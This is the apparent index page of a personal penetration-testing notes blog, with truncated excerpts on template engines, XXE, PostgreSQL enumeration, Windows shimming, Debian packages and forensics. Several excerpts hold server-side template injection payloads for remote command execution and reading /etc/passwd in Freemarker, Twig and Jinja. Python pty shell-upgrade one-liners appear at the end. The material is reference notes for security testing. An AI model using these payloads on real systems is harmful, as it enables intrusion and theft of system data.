akde/infosec

Information security is ultimately about managing risk


  • Mus­tache is a tem­plate engine, used in var­i­ous frame­works. It is “log­ic less”, it sup­ports if statemets, but it does not have many log­i­cal operations. Han­dle­bar is an exten­sion of Mus­tache with more capabilities. Read vari­ables: {{name}} With han­dle­bar, try to read a file: {{read "/etc/passwd"}} Or try to list a directory: {{#each (readdir "/etc")}} {{this}}{{/each}}


  • Pug (pre­vi­ous­ly known as Jade) is a JavaScript tem­plate engine, used with node­js or express applications. Show­ing a val­ue of a vari­able: (Impor­tant: With­out a “HTML func­tion” like p, there is noth­ing to show) p #{name} The input state­ment cre­ates a hid­den field: input(type='hidden' name='secret' value='42') Pro­voke an error: #{"a" * 5} // Should produce an error#{"5" *…


  • Apache Freemark­er is a tem­plate engine, some­times used with Java application. Old­er Freemark­er engines did not pre­vent HTML in strings. There­fore, try in a field some­thing like this: Ha<b>llo</b> Show the val­ue of a variable: ${var} Exe­cu­tion to force an error message: ${'a'*5} RCE: ${"freemarker.template.utility.Execute"?new()("whoami")}


  • Twig is a MVC-based tem­plate engine for PHP. Doc­u­men­ta­tion Out­put a value: {{ var }} Force a error, e.g. via a invalid operation: {{'a' * 5}} Con­cata­na­tion of strings: {{ 'a' ~ 'a' }} The reduce method take a func­tion and then para­me­ters… (It’s a PHP tem­plate engine, remember?) {{ [0]|reduce('system','whoami')}}{{ [0]|reduce('exec', 'whoami') }}{{ [0]|reduce('shell_exec', 'whoami') }}{{…


  • Check with {{ 7+3 }} if this is exe­cut­ed, if a Python inter­preter is using the tem­plate jin­ja engine. {{ 7+3 }}{{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}{{ request.environ[‘werkzeug.server.shutdown’]() }} // ...{{ config.items() }} // Read all config variables{{ config|pprint }} Exam­ple:


  • A XML Exter­nal Enti­ty is a tech­nique where a XML file con­tains a state­ment which leads the XML pars­er to include results from an exter­nal source into the XML file. The benign idea is for exam­ple to replace a string mul­ti­ple times with a pre­de­fined value: <!DOCTYPE data [<!ELEMENT data ANY ><!ENTITY name "Olaf">]><data>...<name>&name;</name>...</data> Impor­tant: data…


  • Enumeration Get ver­sion: select version(); Get cur­rent user: select current_user; Get all databases: select datname from pg_database; Get all tables from a database: select table_name from $dbname.information_schema.tables where table_schema = 'public'; Get details about a table:


  • The Win­dows Appli­ca­tion Com­pat­i­bil­i­ty Frame­work (shim­ming) pro­vides a way to change the sys­tem behav­iour for an appli­ca­tion in order to func­tion like in old­er sys­tems. It works via the IAT Import address Table at load time and can change func­tions, library address­es etc. this way. Creating a shim A shim can be reg­is­tered with the sys­tem via…


  • Subwiz https://github.com/hadriansecurity/subwiz can pre­dict pos­si­ble sub­do­mains via a LLM. Subfinder https://github.com/projectdiscovery/subfinder tries to get sub­do­mains via pas­sive infor­ma­tion gathering. Gobuster Gob­uster can brute-force subdomains.


  • Depen­den­cy scan­ner. Builds SBOM out of Dock­er images and direc­to­ries / projects.


  • Show info: dpkg --info $package Show all files of a deb: dpkg -L $package Show all installed packages: dpkg -l Search for a file or path: dpkg -S htpasswd Show why a pack­age was installed: apitude why apache2-utils About deb files A deb file is a ar archive with this structure: $ ar t example.debdebian-binarycontrol.tar.xz (or .gz or…


  • Show sys­tem files which were changed after installation. dpkg --verify Check var­i­ous secu­ri­ty relat­ed issues: checksecurity Tools


  • Some notes: Build an own Kali ISO image apt install curl git live-buildgit clone https://gitlab.com/kalilinux/build-scripts/live-build-config.gitcd live-build-config..../build.sh --verbose This will cre­ate a cus­tom ISO.


  • Mem­o­ry ana­lyza­tion soft­wrae to see phys­i­cal mem­o­ry as files in a vir­tu­al file system. GitHub — ufrisk/MemProcFS: MemProcFS


  • See also mem­o­ry dump article. Usu­al stuff: Spe­cial­ized software: Thinks to look out for:


  • Note: See many, many com­mands from the Lin­ux privesc post. Analyze logs On sys­tems: Browse through the /var/log files. On new­er sys­tems with systemd: Note: If you have an image, you can also ana­lyze logs from a mount­ed image like journalctl --root /mnt/hdd23 -t ssh ... Analyze startup services On SysVinit: Browse through /etc/init.d/ On…


  • Windows Detect­ing PE/DLL injection:


  • See also the Bina­ry analy­sis post Win­dows uses as for­mat for the exe­cute­able files the PE Portable Exe­cute­able for­mat. This is a bina­ry for­mat which can be used as a Eng­lish (light ‘xkcd’) — Imgur has a graph­i­cal overview.


  • See the Analy­sis data / foren­sic arti­cle for gen­er­al data analy­sis. Also, rel­e­vant articles: Static analysis Notes before­hand: Have a first look into the file: xxd file.exe | less Have a look into the file segments binwalk file.exe Have a look in the strings strings file.exefloss file.exe You can try to visu­al­ize the entropy to maybe…


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';